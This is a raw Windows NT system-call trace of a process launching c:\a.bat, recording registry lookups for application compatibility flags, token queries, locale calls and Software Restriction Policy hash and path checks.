0, 1, 0, 0, 0, ... ) }, 0x0, 128, 0, 1, 0, 0, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01053 896 NtOpenFile (0x100001, {24, 0, 0x40, 0, 0, (0x100001, {24, 0, 0x40, 0, 0, "\??\c:\"}, 3, 16417, ... 72, {status=0x0, info=1}, ) }, 3, 16417, ... 72, {status=0x0, info=1}, ) == 0x0 01054 896 NtQueryDirectoryFile (72, 0, 0, 0, 1228196, 616, BothDirectory, 1, (72, 0, 0, 0, 1228196, 616, BothDirectory, 1, "a.bat", 0, ... {status=0x0, info=104}, ) , 0, ... {status=0x0, info=104}, ) == 0x0 01055 896 NtClose (72, ... ) == 0x0 01056 896 NtQueryInformationProcess (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0 01057 896 NtSetInformationProcess (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0 01058 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\c:\a.bat"}, 1228572, ... ) }, 1228572, ... ) == 0x0 01059 896 NtOpenFile (0x100001, {24, 0, 0x40, 0, 0, (0x100001, {24, 0, 0x40, 0, 0, "\??\c:\"}, 3, 16417, ... 72, {status=0x0, info=1}, ) }, 3, 16417, ... 72, {status=0x0, info=1}, ) == 0x0 01060 896 NtQueryDirectoryFile (72, 0, 0, 0, 1228000, 616, BothDirectory, 1, (72, 0, 0, 0, 1228000, 616, BothDirectory, 1, "a.bat", 0, ... {status=0x0, info=104}, ) , 0, ... {status=0x0, info=104}, ) == 0x0 01061 896 NtClose (72, ... ) == 0x0 01062 896 NtQueryInformationProcess (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0 01063 896 NtSetInformationProcess (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0 01064 896 NtQueryInformationProcess (-1, DeviceMap, 36, ... {process info, class 23, size 36}, 0x0, ) == 0x0 01065 896 NtOpenKey (0x80000100, {24, 0, 0x40, 0, 0, (0x80000100, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01066 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01067 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 72, ) == 0x0 01068 896 NtQueryInformationToken (72, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01069 896 NtClose (72, ... ) == 0x0 01070 896 NtOpenKey (0x80000100, {24, 0, 0x40, 0, 0, (0x80000100, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01071 896 NtOpenKey (0x80000100, {24, 0, 0x40, 0, 0, (0x80000100, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom\a.bat"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01072 896 NtQueryInformationProcess (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0 01073 896 NtSetInformationProcess (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0 01074 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\c:\a.bat"}, 1229824, ... ) }, 1229824, ... ) == 0x0 01075 896 NtOpenFile (0x100001, {24, 0, 0x40, 0, 0, (0x100001, {24, 0, 0x40, 0, 0, "\??\c:\"}, 3, 16417, ... 72, {status=0x0, info=1}, ) }, 3, 16417, ... 72, {status=0x0, info=1}, ) == 0x0 01076 896 NtQueryDirectoryFile (72, 0, 0, 0, 1229252, 616, BothDirectory, 1, (72, 0, 0, 0, 1229252, 616, BothDirectory, 1, "a.bat", 0, ... {status=0x0, info=104}, ) , 0, ... {status=0x0, info=104}, ) == 0x0 01077 896 NtClose (72, ... ) == 0x0 01078 896 NtQueryInformationProcess (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0 01079 896 NtSetInformationProcess (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0 01080 896 NtWaitForSingleObject (56, 0, {-1000000, -1}, ... ) == 0x0 01081 896 NtQueryVolumeInformationFile (52, 1230480, 8, Device, ... {status=0x0, info=8}, ) == 0x0 01082 896 NtQueryInformationFile (52, 1230460, 40, Basic, ... {status=0x0, info=40}, ) == 0x0 01083 896 NtQueryInformationFile (52, 1230500, 24, Standard, ... {status=0x0, info=24}, ) == 0x0 01084 896 NtReleaseMutant (56, ... 0x0, ) == 0x0 01085 896 NtUnmapViewOfSection (-1, 0xae0000, ... ) == 0x0 01086 896 NtClose (68, ... ) == 0x0 01087 896 NtClose (64, ... ) == 0x0 01088 896 NtOpenThreadToken (-2, 0x2000000, 1, ... ) == STATUS_NO_TOKEN 01089 896 NtOpenProcessToken (-1, 0xa, ... 64, ) == 0x0 01090 896 NtQueryInformationToken (64, User, 136, ... {token info, class 1, size 36}, 36, ) == 0x0 01091 896 NtOpenKey (0x3, {24, 0, 0x40, 0, 0, (0x3, {24, 0, 0x40, 0, 0, "\Registry\MACHINE\System\CurrentControlSet\Control\SafeBoot\Option"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01092 896 NtOpenKey (0x1, {24, 0, 0x40, 0, 0, (0x1, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 68, ) }, ... 68, ) == 0x0 01093 896 NtQueryValueKey (68, (68, "TransparentEnabled", Partial, 80, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) , Partial, 80, ... TitleIdx=0, Type=4, Data= (68, "TransparentEnabled", Partial, 80, ... TitleIdx=0, Type=4, Data="\1\0\0\0"}, 16, ) }, 16, ) == 0x0 01094 896 NtQueryValueKey (68, (68, "AuthenticodeEnabled", Partial, 80, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 80, ... TitleIdx=0, Type=4, Data= (68, "AuthenticodeEnabled", Partial, 80, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 01095 896 NtClose (68, ... ) == 0x0 01096 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\LevelObjects"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01097 896 NtOpenKey (0x1, {24, 0, 0x40, 0, 0, (0x1, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers"}, ... 68, ) }, ... 68, ) == 0x0 01098 896 NtQueryValueKey (68, (68, "Levels", Partial, 536, ... ) , Partial, 536, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01099 896 NtClose (68, ... ) == 0x0 01100 896 NtQueryDefaultUILanguage (2090319928, ... 01101 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01102 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... -2147481368, ) == 0x0 01103 896 NtQueryInformationToken (-2147481368, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01104 896 NtClose (-2147481368, ... ) == 0x0 01105 896 NtOpenKey (0x2000000, {24, 0, 0x640, 0, 0, (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... -2147481368, ) }, ... -2147481368, ) == 0x0 01106 896 NtOpenKey (0x80000000, {24, -2147481368, 0x240, 0, 0, (0x80000000, {24, -2147481368, 0x240, 0, 0, "Software\Policies\Microsoft\Control Panel\Desktop"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01107 896 NtOpenKey (0x80000000, {24, -2147481368, 0x640, 0, 0, (0x80000000, {24, -2147481368, 0x640, 0, 0, "Control Panel\Desktop"}, ... -2147481452, ) }, ... -2147481452, ) == 0x0 01108 896 NtQueryValueKey (-2147481452, (-2147481452, "MultiUILanguageId", Partial, 256, ... ) , Partial, 256, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01109 896 NtClose (-2147481452, ... ) == 0x0 01110 896 NtClose (-2147481368, ... ) == 0x0 01100 896 NtQueryDefaultUILanguage ... ) == 0x0 01111 896 NtQueryInstallUILanguage (2090319930, ... ) == 0x0 01112 896 NtQueryDefaultLocale (1, 1231672, ... ) == 0x0 01113 896 NtQueryDefaultLocale (1, 1231672, ... ) == 0x0 01114 896 NtAllocateVirtualMemory (-1, 1339392, 0, 4096, 4096, 4, ... 1339392, 4096, ) == 0x0 01115 896 NtQueryDefaultLocale (1, 1231672, ... ) == 0x0 01116 896 NtQueryDefaultLocale (1, 1231672, ... ) == 0x0 01117 896 NtQueryDefaultLocale (1, 1231672, ... ) == 0x0 01118 896 NtQueryDefaultLocale (1, 1231672, ... ) == 0x0 01119 896 NtQueryDefaultLocale (1, 1231672, ... ) == 0x0 01120 896 NtQueryDefaultLocale (1, 1231672, ... ) == 0x0 01121 896 NtQueryDefaultLocale (1, 1231672, ... ) == 0x0 01122 896 NtQueryDefaultLocale (1, 1231672, ... ) == 0x0 01123 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths"}, ... 68, ) }, ... 68, ) == 0x0 01124 896 NtEnumerateKey (68, 0, Basic, 280, ... {LastWrite={0x3a5edea,0x1c74da9}, TitleIdx=0, Name= (68, 0, Basic, 280, ... {LastWrite={0x3a5edea,0x1c74da9}, TitleIdx=0, Name="{dda3f824-d8cb-441b-834d-be2efd2c1a33}"}, 92, ) }, 92, ) == 0x0 01125 896 NtOpenKey (0x20019, {24, 68, 0x40, 0, 0, (0x20019, {24, 68, 0x40, 0, 0, "{dda3f824-d8cb-441b-834d-be2efd2c1a33}"}, ... 72, ) }, ... 72, ) == 0x0 01126 896 NtQueryValueKey (72, (72, "ItemData", Partial, 280, ... TitleIdx=0, Type=2, Data="%\0H\0K\0E\0Y\0_\0C\0U\0R\0R\0E\0N\0T\0_\0U\0S\0E\0R\0\\0S\0o\0f\0t\0w\0a\0r\0e\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0W\0i\0n\0d\0o\0w\0s\0\\0C\0u\0r\0r\0e\0n\0t\0V\0e\0r\0s\0i\0o\0n\0\\0E\0x\0p\0l\0o\0r\0e\0r\0\\0S\0h\0e\0l\0l\0 \0F\0o\0l\0d\0e\0r\0s\0\\0C\0a\0c\0h\0e\0%\0O\0L\0K\0*\0\0\0"}, 202, ) , Partial, 280, ... TitleIdx=0, Type=2, Data= (72, "ItemData", Partial, 280, ... TitleIdx=0, Type=2, Data="%\0H\0K\0E\0Y\0_\0C\0U\0R\0R\0E\0N\0T\0_\0U\0S\0E\0R\0\\0S\0o\0f\0t\0w\0a\0r\0e\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0W\0i\0n\0d\0o\0w\0s\0\\0C\0u\0r\0r\0e\0n\0t\0V\0e\0r\0s\0i\0o\0n\0\\0E\0x\0p\0l\0o\0r\0e\0r\0\\0S\0h\0e\0l\0l\0 \0F\0o\0l\0d\0e\0r\0s\0\\0C\0a\0c\0h\0e\0%\0O\0L\0K\0*\0\0\0"}, 202, ) }, 202, ) == 0x0 01127 896 NtQueryValueKey (72, (72, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (72, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 01128 896 NtClose (72, ... ) == 0x0 01129 896 NtEnumerateKey (68, 1, Basic, 280, ... ) == STATUS_NO_MORE_ENTRIES 01130 896 NtClose (68, ... ) == 0x0 01131 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes"}, ... 68, ) }, ... 68, ) == 0x0 01132 896 NtEnumerateKey (68, 0, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name= (68, 0, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name="{349d35ab-37b5-462f-9b89-edd5fbde1328}"}, 92, ) }, 92, ) == 0x0 01133 896 NtOpenKey (0x20019, {24, 68, 0x40, 0, 0, (0x20019, {24, 68, 0x40, 0, 0, "{349d35ab-37b5-462f-9b89-edd5fbde1328}"}, ... 72, ) }, ... 72, ) == 0x0 01134 896 NtQueryValueKey (72, (72, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="^\2530O\225zI\211j\0l\341\25@\25"}, 28, ) , Partial, 280, ... TitleIdx=0, Type=3, Data= (72, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="^\2530O\225zI\211j\0l\341\25@\25"}, 28, ) }, 28, ) == 0x0 01135 896 NtQueryValueKey (72, (72, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (72, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) }, 16, ) == 0x0 01136 896 NtQueryValueKey (72, (72, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="\13\3\0\0\0\0\0\0"}, 20, ) , Partial, 280, ... TitleIdx=0, Type=11, Data= (72, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="\13\3\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0 01137 896 NtQueryValueKey (72, (72, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (72, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 01138 896 NtClose (72, ... ) == 0x0 01139 896 NtEnumerateKey (68, 1, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name= (68, 1, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name="{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}"}, 92, ) }, 92, ) == 0x0 01140 896 NtOpenKey (0x20019, {24, 68, 0x40, 0, 0, (0x20019, {24, 68, 0x40, 0, 0, "{7fb9cd2e-3076-4df9-a57b-b813f72dbb91}"}, ... 72, ) }, ... 72, ) == 0x0 01141 896 NtQueryValueKey (72, (72, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="g\260\324\2134:?\323\274\351\334dg\4\363\224"}, 28, ) , Partial, 280, ... TitleIdx=0, Type=3, Data= (72, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="g\260\324\2134:?\323\274\351\334dg\4\363\224"}, 28, ) }, 28, ) == 0x0 01142 896 NtQueryValueKey (72, (72, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (72, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) }, 16, ) == 0x0 01143 896 NtQueryValueKey (72, (72, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="\5\2\0\0\0\0\0\0"}, 20, ) , Partial, 280, ... TitleIdx=0, Type=11, Data= (72, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="\5\2\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0 01144 896 NtQueryValueKey (72, (72, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (72, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 01145 896 NtClose (72, ... ) == 0x0 01146 896 NtEnumerateKey (68, 2, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name= (68, 2, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name="{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}"}, 92, ) }, 92, ) == 0x0 01147 896 NtOpenKey (0x20019, {24, 68, 0x40, 0, 0, (0x20019, {24, 68, 0x40, 0, 0, "{81d1fe15-dd9d-4762-b16d-7c29ddecae3f}"}, ... 72, ) }, ... 72, ) == 0x0 01148 896 NtQueryValueKey (72, (72, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="2x\2\334\376\370\310\223\334\212\260\6\335\204}\35"}, 28, ) , Partial, 280, ... TitleIdx=0, Type=3, Data= (72, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="2x\2\334\376\370\310\223\334\212\260\6\335\204}\35"}, 28, ) }, 28, ) == 0x0 01149 896 NtQueryValueKey (72, (72, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (72, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) }, 16, ) == 0x0 01150 896 NtQueryValueKey (72, (72, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="\226\3\0\0\0\0\0\0"}, 20, ) , Partial, 280, ... TitleIdx=0, Type=11, Data= (72, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="\226\3\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0 01151 896 NtQueryValueKey (72, (72, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (72, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 01152 896 NtClose (72, ... ) == 0x0 01153 896 NtEnumerateKey (68, 3, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name= (68, 3, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name="{94e3e076-8f53-42a5-8411-085bcc18a68d}"}, 92, ) }, 92, ) == 0x0 01154 896 NtOpenKey (0x20019, {24, 68, 0x40, 0, 0, (0x20019, {24, 68, 0x40, 0, 0, "{94e3e076-8f53-42a5-8411-085bcc18a68d}"}, ... 72, ) }, ... 72, ) == 0x0 01155 896 NtQueryValueKey (72, (72, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="\275\232*\333B\353\330V\16%\16M\370\26/g"}, 28, ) , Partial, 280, ... TitleIdx=0, Type=3, Data= (72, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="\275\232*\333B\353\330V\16%\16M\370\26/g"}, 28, ) }, 28, ) == 0x0 01156 896 NtQueryValueKey (72, (72, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (72, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) }, 16, ) == 0x0 01157 896 NtQueryValueKey (72, (72, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="\345\0\0\0\0\0\0\0"}, 20, ) , Partial, 280, ... TitleIdx=0, Type=11, Data= (72, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="\345\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0 01158 896 NtQueryValueKey (72, (72, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (72, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 01159 896 NtClose (72, ... ) == 0x0 01160 896 NtEnumerateKey (68, 4, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name= (68, 4, Basic, 280, ... {LastWrite={0x38ab3b74,0x1c74d7e}, TitleIdx=0, Name="{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}"}, 92, ) }, 92, ) == 0x0 01161 896 NtOpenKey (0x20019, {24, 68, 0x40, 0, 0, (0x20019, {24, 68, 0x40, 0, 0, "{dc971ee5-44eb-4fe4-ae2e-b91490411bfc}"}, ... 72, ) }, ... 72, ) == 0x0 01162 896 NtQueryValueKey (72, (72, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="8k\10_\204\354\366i\323k\225j"\300\36\200"}, 28, ) , Partial, 280, ... TitleIdx=0, Type=3, Data= (72, "ItemData", Partial, 280, ... TitleIdx=0, Type=3, Data="8k\10_\204\354\366i\323k\225j"\300\36\200"}, 28, ) \300\36\200"}, 28, ) == 0x0 01163 896 NtQueryValueKey (72, (72, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (72, "HashAlg", Partial, 280, ... TitleIdx=0, Type=4, Data="\3\200\0\0"}, 16, ) }, 16, ) == 0x0 01164 896 NtQueryValueKey (72, (72, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="r\1\0\0\0\0\0\0"}, 20, ) , Partial, 280, ... TitleIdx=0, Type=11, Data= (72, "ItemSize", Partial, 280, ... TitleIdx=0, Type=11, Data="r\1\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0 01165 896 NtQueryValueKey (72, (72, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 280, ... TitleIdx=0, Type=4, Data= (72, "SaferFlags", Partial, 280, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0 01166 896 NtClose (72, ... ) == 0x0 01167 896 NtEnumerateKey (68, 5, Basic, 280, ... ) == STATUS_NO_MORE_ENTRIES 01168 896 NtClose (68, ... ) == 0x0 01169 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01170 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01171 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01172 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01173 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01174 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01175 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\65536\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01176 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01177 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01178 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\131072\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01179 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01180 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01181 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\262144\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01182 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01183 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 68, ) == 0x0 01184 896 NtQueryInformationToken (68, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01185 896 NtClose (68, ... ) == 0x0 01186 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01187 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01188 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 68, ) == 0x0 01189 896 NtQueryInformationToken (68, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01190 896 NtClose (68, ... ) == 0x0 01191 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01192 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01193 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 68, ) == 0x0 01194 896 NtQueryInformationToken (68, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01195 896 NtClose (68, ... ) == 0x0 01196 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\UrlZones"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01197 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01198 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 68, ) == 0x0 01199 896 NtQueryInformationToken (68, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01200 896 NtClose (68, ... ) == 0x0 01201 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Paths"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01202 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01203 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... 68, ) == 0x0 01204 896 NtQueryInformationToken (68, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01205 896 NtClose (68, ... ) == 0x0 01206 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers\4096\Hashes"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 